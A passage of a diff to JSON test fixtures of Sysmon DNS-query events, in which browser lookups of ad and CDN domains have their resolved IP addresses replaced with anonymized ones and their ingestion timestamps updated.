@@ -11987,22 +11859,22 @@ "ocsp.comodoca.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313895263Z", + "ingested": "2021-12-09T13:49:44.739676900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
"provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12074,27 +11946,27 @@ "type": "CNAME" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -12112,16 +11984,13 @@ "sync-tm.everesttech.net" ], "ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313896639Z", + "ingested": "2021-12-09T13:49:44.739681400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12181,11 +12050,11 @@ }, "answers": [ { - "data": "34.95.92.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12193,7 +12062,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -12201,7 +12070,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12209,7 +12078,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12217,7 +12086,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -12225,23 +12094,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -12256,24 +12125,24 @@ "idsync.rlcdn.com" ], "ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313898380Z", + "ingested": "2021-12-09T13:49:44.739686700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12337,37 +12206,37 @@ "type": "CNAME" }, { - "data": "37.157.2.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.253", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.2.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.24", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.247", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -12383,18 +12252,13 @@ "cm.adform.net" ], "ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313899666Z", + "ingested": "2021-12-09T13:49:44.739691900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12454,12 +12318,12 @@ }, "answers": [ { - "data": "37.18.16.16", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "network": { 
@@ -12474,13 +12338,13 @@ "dm.hybrid.ai" ], "ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313900936Z", + "ingested": "2021-12-09T13:49:44.739697800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12544,11 +12408,11 @@ "type": "CNAME" }, { - "data": "199.166.0.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12556,7 +12420,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12564,7 +12428,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12572,7 +12436,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -12580,21 +12444,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -12610,22 +12474,22 @@ "static.adsafeprotected.com" ], "ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313902306Z", + "ingested": "2021-12-09T13:49:44.739703600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
